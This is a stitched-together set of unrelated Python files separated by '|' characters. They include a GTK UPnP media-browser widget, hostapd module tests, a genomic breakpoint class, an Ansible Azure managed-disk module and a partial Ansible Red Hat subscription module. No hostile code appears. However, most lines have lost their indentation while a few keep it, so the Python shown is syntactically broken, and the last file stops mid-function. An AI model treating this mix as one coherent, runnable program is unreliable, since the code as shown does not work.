self.treeview.connect("row-expanded", self.row_expanded)
self.treeview.connect("button_press_event", self.button_action)
self.treeview.set_property("has-tooltip", True)
self.treeview.connect("query-tooltip", self.show_tooltip)
self.tooltip_path = None
self.we_are_scrolling = None
def end_scrolling():
self.we_are_scrolling = None
def start_scrolling(w,e):
            if self.we_are_scrolling is not None:
gobject.source_remove(self.we_are_scrolling)
self.we_are_scrolling = gobject.timeout_add(800, end_scrolling)
self.treeview.connect('scroll-event', start_scrolling)
self.window.add(self.treeview)
def show_tooltip(self, widget, x, y, keyboard_mode, tooltip):
        if self.we_are_scrolling is not None:
return False
ret = False
try:
path = self.treeview.get_dest_row_at_pos(x, y)
iter = self.store.get_iter(path[0])
title,object_id,upnp_class,item = self.store.get(iter,NAME_COLUMN,ID_COLUMN,UPNP_CLASS_COLUMN,DIDL_COLUMN)
from coherence.upnp.core import DIDLLite
if upnp_class == 'object.item.videoItem':
self.tooltip_path = object_id
item = DIDLLite.DIDLElement.fromString(item).getItems()[0]
tooltip_icon, = self.store.get(iter,TOOLTIP_ICON_COLUMN)
                if tooltip_icon is not None:
tooltip.set_icon(tooltip_icon)
else:
tooltip.set_icon(self.video_icon)
for res in item.res:
protocol,network,content_format,additional_info = res.protocolInfo.split(':')
if(content_format == 'image/jpeg' and
'DLNA.ORG_PN=JPEG_TN' in additional_info.split(';')):
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(res.data)).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
tooltip.set_icon(icon)
self.store.set_value(iter, TOOLTIP_ICON_COLUMN, icon)
#print "got poster", icon
break
                title = title.replace('&','&amp;')
                try:
                    director = item.director.replace('&','&amp;')
                except AttributeError:
                    director = ""
                try:
                    description = item.description.replace('&','&amp;')
except AttributeError:
description = ""
tooltip.set_markup("<b>%s</b>\n"
"<b>Director:</b> %s\n"
"<b>Description:</b> %s" % (title,
director,
description))
ret = True
except TypeError:
#print traceback.format_exc()
pass
except Exception:
#print traceback.format_exc()
#print "something wrong"
pass
return ret
def button_action(self, widget, event):
#print "button_action", widget, event, event.button
        if self.cb_item_right_click is not None:
return self.cb_item_right_click(widget, event)
return 0
def handle_error(self,error):
print error
def handle_devices_reply(self,devices):
for device in devices:
if device['device_type'].split(':')[3] == 'MediaServer':
self.media_server_found(device)
def init_controlpoint(self):
cp = ControlPoint()
self.bus = cp.bus
self.coherence = cp.coherence
self.hostname = self.coherence.hostname(dbus_interface=BUS_NAME)
self.coherence.get_devices(dbus_interface=BUS_NAME,
reply_handler=self.handle_devices_reply,
error_handler=self.handle_error)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_detected', self.media_server_found, dbus_interface=BUS_NAME)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_removed', self.media_server_removed, dbus_interface=BUS_NAME)
self.devices = {}
def device_has_action(self,udn,service,action):
try:
self.devices[udn][service]['actions'].index(action)
return True
except:
return False
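    # ContainerUpdateIDs (UPnP ContentDirectory) arrives as a comma-separated
    # list of alternating container ids and update ids, e.g. '0,12,64,3' means
    # container '0' is at update 12 and container '64' at update 3; hence the
    # pairwise pop below.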
def state_variable_change( self, udn, service, variable, value):
#print "state_variable_change", udn, service, variable, 'changed to', value
if variable == 'ContainerUpdateIDs':
changes = value.split(',')
while len(changes) > 1:
container = changes.pop(0).strip()
update_id = changes.pop(0).strip()
def match_func(model, iter, data):
column, key = data # data is a tuple containing column number, key
value = model.get_value(iter, column)
return value == key
def search(model, iter, func, data):
#print "search", model, iter, data
while iter:
if func(model, iter, data):
return iter
result = search(model, model.iter_children(iter), func, data)
if result: return result
iter = model.iter_next(iter)
return None
row_count = 0
for row in self.store:
if udn == row[UDN_COLUMN]:
iter = self.store.get_iter(row_count)
match_iter = search(self.store, self.store.iter_children(iter),
match_func, (ID_COLUMN, container))
if match_iter:
print "heureka, we have a change in ", container, ", container needs a reload"
path = self.store.get_path(match_iter)
expanded = self.treeview.row_expanded(path)
child = self.store.iter_children(match_iter)
while child:
self.store.remove(child)
child = self.store.iter_children(match_iter)
self.browse(self.treeview,path,None,
starting_index=0,requested_count=0,force=True,expand=expanded)
break
row_count += 1
def media_server_found(self,device,udn=None):
#print "media_server_found", device['friendly_name']
item = self.store.append(None)
self.store.set_value(item, NAME_COLUMN, device['friendly_name'])
self.store.set_value(item, ID_COLUMN, '0')
self.store.set_value(item, UPNP_CLASS_COLUMN, 'root')
self.store.set_value(item, CHILD_COUNT_COLUMN, -1)
self.store.set_value(item, UDN_COLUMN, str(device['udn']))
self.store.set_value(item, ICON_COLUMN, self.device_icon)
self.store.set_value(item, DIDL_COLUMN, '')
self.store.set_value(item, TOOLTIP_ICON_COLUMN, None)
self.store.append(item, ('...loading...','','placeholder',-1,'','',None,'',None))
self.devices[str(device['udn'])] = {'ContentDirectory':{}}
for service in device['services']:
service_type = service.split('/')[-1]
if service_type == 'ContentDirectory':
self.store.set_value(item, SERVICE_COLUMN, service)
self.devices[str(device['udn'])]['ContentDirectory'] = {}
def reply(r,udn):
self.devices[udn]['ContentDirectory']['actions'] = r
def got_icons(r,udn,item):
#print 'got_icons', r
for icon in r:
###FIXME, we shouldn't just use the first icon
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(icon['url'])).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
icon = icon.scale_simple(16,16,gtk.gdk.INTERP_BILINEAR)
self.store.set_value(item, ICON_COLUMN, icon)
break
def reply_subscribe(udn, service, r):
for k,v in r.iteritems():
self.state_variable_change(udn,service,k,v)
s = self.bus.get_object(BUS_NAME+'.service',service)
s.connect_to_signal('StateVariableChanged', self.state_variable_change, dbus_interface=BUS_NAME+'.service')
s.get_available_actions(reply_handler=lambda x : reply(x,str(device['udn'])),error_handler=self.handle_error)
s.subscribe(reply_handler=reply_subscribe,error_handler=self.handle_error)
d = self.bus.get_object(BUS_NAME+'.device',device['path'])
d.get_device_icons(reply_handler=lambda x : got_icons(x,str(device['udn']),item),error_handler=self.handle_error)
def media_server_removed(self,udn):
#print "media_server_removed", udn
row_count = 0
for row in self.store:
if udn == row[UDN_COLUMN]:
self.store.remove(self.store.get_iter(row_count))
del self.devices[str(udn)]
break
row_count += 1
def row_expanded(self,view,iter,row_path):
#print "row_expanded", view,iter,row_path
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class == 'placeholder':
self.browse(view,row_path,None)
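    # browse() doubles as the row-activation handler and the ContentDirectory
    # Browse call; when the server returns only a slice of the result set, the
    # reply handler re-issues browse() with an advanced starting_index until
    # NumberReturned catches up with TotalMatches.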
def browse(self,view,row_path,column,starting_index=0,requested_count=0,force=False,expand=False):
#print "browse", view,row_path,column,starting_index,requested_count,force
iter = self.store.get_iter(row_path)
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class != 'placeholder':
                if not force:
if view.row_expanded(row_path):
view.collapse_row(row_path)
else:
view.expand_row(row_path, False)
return
title,object_id,upnp_class = self.store.get(iter,NAME_COLUMN,ID_COLUMN,UPNP_CLASS_COLUMN)
if(not upnp_class.startswith('object.container') and
not upnp_class == 'root'):
url, = self.store.get(iter,SERVICE_COLUMN)
if url == '':
return
print "request to play:", title,object_id,url
            if self.cb_item_dbl_click is not None:
self.cb_item_dbl_click(url)
return
def reply(r):
#print "browse_reply - %s of %s returned" % (r['NumberReturned'],r['TotalMatches'])
from coherence.upnp.core import DIDLLite
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class == 'placeholder':
self.store.remove(child)
title, = self.store.get(iter,NAME_COLUMN)
try:
title = title[:title.rindex('(')]
self.store.set_value(iter,NAME_COLUMN, "%s(%d)" % (title,int(r['TotalMatches'])))
except ValueError:
pass
didl = DIDLLite.DIDLElement.fromString(r['Result'])
for item in didl.getItems():
#print item.title, item.id, item.upnp_class
if item.upnp_class.startswith('object.container'):
icon = self.folder_icon
service, = self.store.get(iter,SERVICE_COLUMN)
child_count = item.childCount
try:
title = "%s (%d)" % (item.title,item.childCount)
except TypeError:
title = "%s (n/a)" % item.title
child_count = -1
else:
icon=None
service = ''
if callable(self.cb_resource_chooser):
service = self.cb_resource_chooser(item.res)
else:
res = item.res.get_matching(['*:%s:*:*' % self.hostname], protocol_type='internal')
if len(res) == 0:
res = item.res.get_matching(['*:*:*:*'], protocol_type='http-get')
if len(res) > 0:
res = res[0]
remote_protocol,remote_network,remote_content_format,_ = res.protocolInfo.split(':')
service = res.data
child_count = -1
title = item.title
if item.upnp_class.startswith('object.item.audioItem'):
icon = self.audio_icon
elif item.upnp_class.startswith('object.item.videoItem'):
icon = self.video_icon
elif item.upnp_class.startswith('object.item.imageItem'):
icon = self.image_icon
stored_didl = DIDLLite.DIDLElement()
stored_didl.addItem(item)
new_iter = self.store.append(iter, (title,item.id,item.upnp_class,child_count,'',service,icon,stored_didl.toString(),None))
if item.upnp_class.startswith('object.container'):
self.store.append(new_iter, ('...loading...','','placeholder',-1,'','',None,'',None))
if((int(r['TotalMatches']) > 0 and force==False) or
expand==True):
view.expand_row(row_path, False)
if(requested_count != int(r['NumberReturned']) and
int(r['NumberReturned']) < (int(r['TotalMatches'])-starting_index)):
print "seems we have been returned only a part of the result"
print "requested %d, starting at %d" % (requested_count,starting_index)
print "got %d out of %d" % (int(r['NumberReturned']), int(r['TotalMatches']))
print "requesting more starting now at %d" % (starting_index+int(r['NumberReturned']))
self.browse(view,row_path,column,
starting_index=starting_index+int(r['NumberReturned']),
force=True)
service, = self.store.get(iter,SERVICE_COLUMN)
if service == '':
return
s = self.bus.get_object(BUS_NAME+'.service',service)
s.action('browse',
{'object_id':object_id,'process_result':'no',
'starting_index':str(starting_index),'requested_count':str(requested_count)},
reply_handler=reply,error_handler=self.handle_error)
def destroy_object(self, row_path):
#print "destroy_object", row_path
iter = self.store.get_iter(row_path)
object_id, = self.store.get(iter,ID_COLUMN)
parent_iter = self.store.iter_parent(iter)
service, = self.store.get(parent_iter,SERVICE_COLUMN)
if service == '':
return
def reply(r):
#print "destroy_object reply", r
pass
s = self.bus.get_object(BUS_NAME+'.service',service)
s.action('destroy_object',
{'object_id':object_id},
reply_handler=reply,error_handler=self.handle_error)
if __name__ == '__main__':
ui=TreeWidget()
window = gtk.Window()
window.connect("delete_event", gtk.main_quit)
window.set_default_size(350, 550)
window.add(ui.window)
window.show_all()
gtk.gdk.threads_init()
gtk.main()
|
import os
import time
import hostapd
def test_module_wpa_supplicant(dev, apdev, params):
"""wpa_supplicant module tests"""
if "OK" not in dev[0].global_request("MODULE_TESTS"):
raise Exception("Module tests failed")
# allow eloop test to complete
time.sleep(0.75)
dev[0].relog()
with open(os.path.join(params['logdir'], 'log0'), 'r') as f:
res = f.read()
if "FAIL - should not have called this function" in res:
raise Exception("eloop test failed")
def test_module_hostapd(dev):
"""hostapd module tests"""
hapd_global = hostapd.HostapdGlobal()
if "OK" not in hapd_global.ctrl.request("MODULE_TESTS"):
raise Exception("Module tests failed")
|
'''
Created on Jun 11, 2011
@author: mkiyer
'''
class Breakpoint(object):
def __init__(self):
self.name = None
self.seq5p = None
self.seq3p = None
self.chimera_names = []
@property
def pos(self):
"""
return position of break along sequence measured from 5' -> 3'
"""
return len(self.seq5p)
@staticmethod
def from_list(fields):
b = Breakpoint()
b.name = fields[0]
b.seq5p = fields[1]
b.seq3p = fields[2]
b.chimera_names = fields[3].split(',')
return b
def to_list(self):
fields = [self.name, self.seq5p, self.seq3p]
fields.append(','.join(self.chimera_names))
return fields
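# Round-trip sketch (hypothetical values) for the record format assumed by
# from_list()/to_list():
#   b = Breakpoint.from_list(['B1', 'ACGT', 'TTGA', 'chimera1,chimera2'])
#   assert b.pos == 4
#   assert b.to_list() == ['B1', 'ACGT', 'TTGA', 'chimera1,chimera2']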
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_managed_disk
version_added: "2.4"
short_description: Manage Azure Managed Disks
description:
- Create, update and delete an Azure Managed Disk
options:
resource_group:
description:
- Name of a resource group where the managed disk exists or will be created.
required: true
name:
description:
- Name of the managed disk.
required: true
state:
description:
- Assert the state of the managed disk. Use C(present) to create or update a managed disk and C(absent) to delete a managed disk.
default: present
choices:
- absent
- present
location:
description:
- Valid Azure location. Defaults to location of the resource group.
storage_account_type:
description:
- "Type of storage for the managed disk: C(Standard_LRS) or C(Premium_LRS). If not specified the disk is created C(Standard_LRS)."
choices:
- Standard_LRS
- Premium_LRS
create_option:
description:
- "Allowed values: empty, import, copy.
- C(import) from a VHD file in I(source_uri) and C(copy) from previous managed disk I(source_uri)."
choices:
- empty
- import
- copy
source_uri:
description:
- URI to a valid VHD file to be used or the resource ID of the managed disk to copy.
aliases:
- source_resource_uri
os_type:
description:
- "Type of Operating System: C(linux) or C(windows)."
- "Used when I(create_option) is either C(copy) or C(import) and the source is an OS disk."
- "If omitted during creation, no value is set."
- "If omitted during an update, no change is made."
- "Once set, this value cannot be cleared."
choices:
- linux
- windows
disk_size_gb:
description:
- "Size in GB of the managed disk to be created."
- "If I(create_option) is C(copy) then the value must be greater than or equal to the source's size."
managed_by:
description:
            - Name of an existing virtual machine with which the disk is or will be associated; this VM should be in the same resource group.
            - To detach a disk from a VM, explicitly set this option to ''.
- If this option is unset, the value will not be changed.
version_added: 2.5
tags:
description:
- Tags to assign to the managed disk.
extends_documentation_fragment:
- azure
- azure_tags
author:
- "Bruno Medina (@brusMX)"
'''
EXAMPLES = '''
- name: Create managed disk
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
- name: Create managed operating system disk from page blob
azure_rm_managed_disk:
name: mymanageddisk
location: eastus2
resource_group: myResourceGroup
create_option: import
source_uri: https://storageaccountname.blob.core.windows.net/containername/blob-name.vhd
os_type: windows
storage_account_type: Premium_LRS
- name: Mount the managed disk to VM
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
managed_by: testvm001
- name: Unmount the managed disk to VM
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
- name: Delete managed disk
  azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
state: absent
'''
RETURN = '''
id:
description: The managed disk resource ID.
returned: always
    type: str
state:
description: Current state of the managed disk
returned: always
type: dict
changed:
description: Whether or not the resource has changed
returned: always
type: bool
'''
import re
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.tools import parse_resource_id
from msrestazure.azure_exceptions import CloudError
except ImportError:
# This is handled in azure_rm_common
pass
def managed_disk_to_dict(managed_disk):
create_data = managed_disk.creation_data
return dict(
id=managed_disk.id,
name=managed_disk.name,
location=managed_disk.location,
tags=managed_disk.tags,
create_option=create_data.create_option.lower(),
source_uri=create_data.source_uri or create_data.source_resource_id,
disk_size_gb=managed_disk.disk_size_gb,
os_type=managed_disk.os_type.lower() if managed_disk.os_type else None,
storage_account_type=managed_disk.sku.name if managed_disk.sku else None,
managed_by=managed_disk.managed_by
)
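# Shape of the dict above (hypothetical values):
#   {'id': '/subscriptions/xxx/resourceGroups/rg/.../disks/mymanageddisk',
#    'name': 'mymanageddisk', 'location': 'eastus', 'tags': None,
#    'create_option': 'empty', 'source_uri': None, 'disk_size_gb': 4,
#    'os_type': None, 'storage_account_type': 'Standard_LRS',
#    'managed_by': None}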
class AzureRMManagedDisk(AzureRMModuleBase):
"""Configuration class for an Azure RM Managed Disk resource"""
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
),
location=dict(
type='str'
),
storage_account_type=dict(
type='str',
choices=['Standard_LRS', 'Premium_LRS']
),
create_option=dict(
type='str',
choices=['empty', 'import', 'copy']
),
source_uri=dict(
type='str',
aliases=['source_resource_uri']
),
os_type=dict(
type='str',
choices=['linux', 'windows']
),
disk_size_gb=dict(
type='int'
),
managed_by=dict(
type='str'
)
)
required_if = [
('create_option', 'import', ['source_uri']),
('create_option', 'copy', ['source_uri']),
('create_option', 'empty', ['disk_size_gb'])
]
self.results = dict(
changed=False,
state=dict())
self.resource_group = None
self.name = None
self.location = None
self.storage_account_type = None
self.create_option = None
self.source_uri = None
self.os_type = None
self.disk_size_gb = None
self.tags = None
self.managed_by = None
super(AzureRMManagedDisk, self).__init__(
derived_arg_spec=self.module_arg_spec,
required_if=required_if,
supports_check_mode=True,
supports_tags=True)
def exec_module(self, **kwargs):
"""Main module execution method"""
for key in list(self.module_arg_spec.keys()) + ['tags']:
setattr(self, key, kwargs[key])
result = None
changed = False
resource_group = self.get_resource_group(self.resource_group)
if not self.location:
self.location = resource_group.location
disk_instance = self.get_managed_disk()
result = disk_instance
# need create or update
if self.state == 'present':
parameter = self.generate_managed_disk_property()
if not disk_instance or self.is_different(disk_instance, parameter):
changed = True
if not self.check_mode:
result = self.create_or_update_managed_disk(parameter)
else:
result = True
# unmount from the old virtual machine and mount to the new virtual machine
            # managed_by may be '' (an explicit detach request); only skip when unset
            if self.managed_by is not None:
vm_name = parse_resource_id(disk_instance.get('managed_by', '')).get('name') if disk_instance else None
vm_name = vm_name or ''
if self.managed_by != vm_name:
changed = True
if not self.check_mode:
if vm_name:
self.detach(vm_name, result)
if self.managed_by:
self.attach(self.managed_by, result)
result = self.get_managed_disk()
if self.state == 'absent' and disk_instance:
changed = True
if not self.check_mode:
self.delete_managed_disk()
result = True
self.results['changed'] = changed
self.results['state'] = result
return self.results
def attach(self, vm_name, disk):
vm = self._get_vm(vm_name)
# find the lun
luns = ([d.lun for d in vm.storage_profile.data_disks]
if vm.storage_profile.data_disks else [])
lun = max(luns) + 1 if luns else 0
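        # i.e. one past the highest LUN in use (gaps are not reused); 0 for
        # the first data disk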
# prepare the data disk
params = self.compute_models.ManagedDiskParameters(id=disk.get('id'), storage_account_type=disk.get('storage_account_type'))
data_disk = self.compute_models.DataDisk(lun=lun, create_option=self.compute_models.DiskCreateOptionTypes.attach, managed_disk=params)
vm.storage_profile.data_disks.append(data_disk)
self._update_vm(vm_name, vm)
def detach(self, vm_name, disk):
vm = self._get_vm(vm_name)
leftovers = [d for d in vm.storage_profile.data_disks if d.name.lower() != disk.get('name').lower()]
if len(vm.storage_profile.data_disks) == len(leftovers):
self.fail("No disk with the name '{0}' was found".format(disk.get('name')))
vm.storage_profile.data_disks = leftovers
self._update_vm(vm_name, vm)
def _update_vm(self, name, params):
try:
poller = self.compute_client.virtual_machines.create_or_update(self.resource_group, name, params)
self.get_poller_result(poller)
except Exception as exc:
self.fail("Error updating virtual machine {0} - {1}".format(name, str(exc)))
def _get_vm(self, name):
try:
return self.compute_client.virtual_machines.get(self.resource_group, name, expand='instanceview')
except Exception as exc:
self.fail("Error getting virtual machine {0} - {1}".format(name, str(exc)))
def generate_managed_disk_property(self):
# TODO: Add support for EncryptionSettings, DiskIOPSReadWrite, DiskMBpsReadWrite, Zones
disk_params = {}
creation_data = {}
disk_params['location'] = self.location
disk_params['tags'] = self.tags
if self.storage_account_type:
storage_account_type = self.compute_models.DiskSku(name=self.storage_account_type)
disk_params['sku'] = storage_account_type
disk_params['disk_size_gb'] = self.disk_size_gb
creation_data['create_option'] = self.compute_models.DiskCreateOption.empty
if self.create_option == 'import':
creation_data['create_option'] = self.compute_models.DiskCreateOption.import_enum
creation_data['source_uri'] = self.source_uri
elif self.create_option == 'copy':
creation_data['create_option'] = self.compute_models.DiskCreateOption.copy
creation_data['source_resource_id'] = self.source_uri
if self.os_type:
typecon = {
'linux': self.compute_models.OperatingSystemTypes.linux,
'windows': self.compute_models.OperatingSystemTypes.windows
}
disk_params['os_type'] = typecon[self.os_type]
else:
disk_params['os_type'] = None
disk_params['creation_data'] = creation_data
return disk_params
def create_or_update_managed_disk(self, parameter):
try:
poller = self.compute_client.disks.create_or_update(
self.resource_group,
self.name,
parameter)
aux = self.get_poller_result(poller)
return managed_disk_to_dict(aux)
except CloudError as e:
self.fail("Error creating the managed disk: {0}".format(str(e)))
# This method accounts for the difference in structure between the
# Azure retrieved disk and the parameters for the new disk to be created.
def is_different(self, found_disk, new_disk):
resp = False
if new_disk.get('disk_size_gb'):
if not found_disk['disk_size_gb'] == new_disk['disk_size_gb']:
resp = True
if new_disk.get('os_type'):
if not found_disk['os_type'] == new_disk['os_type']:
resp = True
if new_disk.get('sku'):
if not found_disk['storage_account_type'] == new_disk['sku'].name:
resp = True
# Check how to implement tags
if new_disk.get('tags') is not None:
if not found_disk['tags'] == new_disk['tags']:
resp = True
return resp
def delete_managed_disk(self):
try:
poller = self.compute_client.disks.delete(
self.resource_group,
self.name)
return self.get_poller_result(poller)
except CloudError as e:
self.fail("Error deleting the managed disk: {0}".format(str(e)))
def get_managed_disk(self):
try:
resp = self.compute_client.disks.get(
self.resource_group,
self.name)
return managed_disk_to_dict(resp)
except CloudError as e:
self.log('Did not find managed disk')
def main():
"""Main execution"""
AzureRMManagedDisk()
if __name__ == '__main__':
main()
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: redhat_subscription
short_description: Manage registration and subscriptions to RHSM using the C(subscription-manager) command
description:
- Manage registration and subscription to the Red Hat Subscription Management entitlement platform using the C(subscription-manager) command
version_added: "1.2"
author: "Barnaby Court (@barnabycourt)"
notes:
- In order to register a system, subscription-manager requires either a username and password, or an activationkey and an Organization ID.
- Since 2.5 values for I(server_hostname), I(server_insecure), I(rhsm_baseurl),
I(server_proxy_hostname), I(server_proxy_port), I(server_proxy_user) and
I(server_proxy_password) are no longer taken from the C(/etc/rhsm/rhsm.conf)
config file and default to None.
requirements:
- subscription-manager
options:
state:
description:
- whether to register and subscribe (C(present)), or unregister (C(absent)) a system
choices: [ "present", "absent" ]
default: "present"
username:
description:
- access.redhat.com or Sat6 username
password:
description:
- access.redhat.com or Sat6 password
server_hostname:
description:
- Specify an alternative Red Hat Subscription Management or Sat6 server
server_insecure:
description:
- Enable or disable https server certificate verification when connecting to C(server_hostname)
rhsm_baseurl:
description:
- Specify CDN baseurl
server_proxy_hostname:
description:
- Specify a HTTP proxy hostname
version_added: "2.4"
server_proxy_port:
description:
- Specify a HTTP proxy port
version_added: "2.4"
server_proxy_user:
description:
- Specify a user for HTTP proxy with basic authentication
version_added: "2.4"
server_proxy_password:
description:
- Specify a password for HTTP proxy with basic authentication
version_added: "2.4"
auto_attach:
description:
- Upon successful registration, auto-consume available subscriptions
        - Added in favor of deprecated autosubscribe in 2.5.
type: bool
default: 'no'
version_added: "2.5"
aliases: [autosubscribe]
activationkey:
description:
- supply an activation key for use with registration
org_id:
description:
- Organization ID to use in conjunction with activationkey
version_added: "2.0"
environment:
description:
- Register with a specific environment in the destination org. Used with Red Hat Satellite 6.x or Katello
version_added: "2.2"
pool:
description:
- |
Specify a subscription pool name to consume. Regular expressions accepted. Use I(pool_ids) instead if
possible, as it is much faster. Mutually exclusive with I(pool_ids).
default: '^$'
pool_ids:
description:
- |
Specify subscription pool IDs to consume. Prefer over I(pool) when possible as it is much faster.
A pool ID may be specified as a C(string) - just the pool ID (ex. C(0123456789abcdef0123456789abcdef)),
or as a C(dict) with the pool ID as the key, and a quantity as the value (ex.
        C(0123456789abcdef0123456789abcdef: 2)). If the quantity is provided, it is used to consume multiple
entitlements from a pool (the pool must support this). Mutually exclusive with I(pool).
default: []
version_added: "2.4"
consumer_type:
description:
- The type of unit to register, defaults to system
version_added: "2.1"
consumer_name:
description:
- Name of the system to register, defaults to the hostname
version_added: "2.1"
consumer_id:
description:
- |
References an existing consumer ID to resume using a previous registration
for this system. If the system's identity certificate is lost or corrupted,
this option allows it to resume using its previous identity and subscriptions.
The default is to not specify a consumer ID so a new ID is created.
version_added: "2.1"
force_register:
description:
- Register the system even if it is already registered
type: bool
default: 'no'
version_added: "2.2"
'''
EXAMPLES = '''
- name: Register as user (joe_user) with password (somepass) and auto-subscribe to available content.
redhat_subscription:
state: present
username: joe_user
password: somepass
auto_attach: true
- name: Same as above but subscribe to a specific pool by ID.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids: 0123456789abcdef0123456789abcdef
- name: Register and subscribe to multiple pools.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids:
- 0123456789abcdef0123456789abcdef
- 1123456789abcdef0123456789abcdef
- name: Same as above but consume multiple entitlements.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids:
- 0123456789abcdef0123456789abcdef: 2
- 1123456789abcdef0123456789abcdef: 4
- name: Register and pull existing system data.
redhat_subscription:
state: present
username: joe_user
password: somepass
consumer_id: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
- name: Register with activationkey and consume subscriptions matching Red Hat Enterprise Server or Red Hat Virtualization
redhat_subscription:
state: present
activationkey: 1-222333444
org_id: 222333444
pool: '^(Red Hat Enterprise Server|Red Hat Virtualization)$'
- name: Update the consumed subscriptions from the previous example (remove Red Hat Virtualization subscription)
redhat_subscription:
state: present
activationkey: 1-222333444
org_id: 222333444
pool: '^Red Hat Enterprise Server$'
- name: Register as user credentials into given environment (against Red Hat Satellite 6.x), and auto-subscribe.
redhat_subscription:
state: present
username: joe_user
password: somepass
environment: Library
auto_attach: true
'''
RETURN = '''
subscribed_pool_ids:
description: List of pool IDs to which system is now subscribed
returned: success
type: complex
contains: {
"8a85f9815ab905d3015ab928c7005de4": "1"
}
'''
import os
import re
import shutil
import tempfile
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.six.moves import configparser
SUBMAN_CMD = None
class RegistrationBase(object):
def __init__(self, module, username=None, password=None):
self.module = module
self.username = username
self.password = password
def configure(self):
raise NotImplementedError("Must be implemented by a sub-class")
def enable(self):
# Remove any existing redhat.repo
redhat_repo = '/etc/yum.repos.d/redhat.repo'
if os.path.isfile(redhat_repo):
os.unlink(redhat_repo)
def register(self):
raise NotImplementedError("Must be implemented by a sub-class")
def unregister(self):
raise NotImplementedError("Must be implemented by a sub-class")
def unsubscribe(self):
raise NotImplementedError("Must be implemented by a sub-class")
def update_plugin_conf(self, plugin, enabled=True):
plugin_conf = '/etc/yum/pluginconf.d/%s.conf' % plugin
if os.path.isfile(plugin_conf):
tmpfd, tmpfile = tempfile.mkstemp()
shutil.copy2(plugin_conf, tmpfile)
cfg = configparser.ConfigParser()
cfg.read([tmpfile])
            if enabled:
                # ConfigParser requires string values on write
                cfg.set('main', 'enabled', '1')
            else:
                cfg.set('main', 'enabled', '0')
fd = open(tmpfile, 'w+')
cfg.write(fd)
fd.close()
self.module.atomic_move(tmpfile, plugin_conf)
def subscribe(self, **kwargs):
raise NotImplementedError("Must be implemented by a sub-class")
class Rhsm(RegistrationBase):
def __init__(self, module, username=None, password=None):
RegistrationBase.__init__(self, module, username, password)
self.module = module
def enable(self):
'''
Enable the system to receive updates from subscription-manager.
This involves updating affected yum plugins and removing any
conflicting yum repositories.
'''
RegistrationBase.enable(self)
self.update_plugin_conf('rhnplugin', False)
self.update_plugin_conf('subscription-manager', True)
def configure(self, **kwargs):
'''
Configure the system as directed for registration with RHSM
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'config']
# Pass supplied **kwargs as parameters to subscription-manager. Ignore
# non-configuration parameters and replace '_' with '.'. For example,
# 'server_hostname' becomes '--server.hostname'.
for k, v in kwargs.items():
if re.search(r'^(server|rhsm)_', k) and v is not None:
args.append('--%s=%s' % (k.replace('_', '.', 1), v))
self.module.run_command(args, check_rc=True)
@property
def is_registered(self):
'''
        Determine whether the current system is registered.
Returns:
* Boolean - whether the current system is currently registered to
RHSM.
'''
args = [SUBMAN_CMD, 'identity']
rc, stdout, stderr = self.module.run_command(args, check_rc=False)
if rc == 0:
return True
else:
return False
def register(self, username, password, auto_attach, activationkey, org_id,
consumer_type, consumer_name, consumer_id, force_register, environment,
rhsm_baseurl, server_insecure, server_hostname, server_proxy_hostname,
server_proxy_port, server_proxy_user, server_proxy_password):
'''
Register the current system to the provided RHSM or Sat6 server
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'register']
# Generate command arguments
if force_register:
args.extend(['--force'])
if rhsm_baseurl:
args.extend(['--baseurl', rhsm_baseurl])
if server_insecure:
args.extend(['--insecure'])
if server_hostname:
args.extend(['--serverurl', server_hostname])
if org_id:
args.extend(['--org', org_id])
if activationkey:
args.extend(['--activationkey', activationkey])
else:
if auto_attach:
args.append('--auto-attach')
if username:
args.extend(['--username', username])
if password:
args.extend(['--password', password])
if consumer_type:
args.extend(['--type', consumer_type])
if consumer_name:
args.extend(['--name', consumer_name])
if consumer_id:
args.extend(['--consumerid', consumer_id])
if environment:
args.extend(['--environment', environment])
if server_proxy_hostname and server_proxy_port:
args.extend(['--proxy', server_proxy_hostname + ':' + server_proxy_port])
if server_proxy_user:
args.extend(['--proxyuser', server_proxy_user])
if server_proxy_password:
args.extend(['--proxypassword', server_proxy_password])
        rc, stdout, stderr = self.module.run_command(args, check_rc=True)
def unsubscribe(self, serials=None):
'''
Unsubscribe a system from subscribed channels
Args:
serials(list or None): list of serials to unsubscribe. If
serials is none or an empty list, then
all subscribed channels will be removed.
Raises:
* Exception - if error occurs while running command
'''
items = []
if serials is not None and serials:
items = ["--serial=%s" % s for s in serials]
if serials is None:
items = ["--all"]
if items:
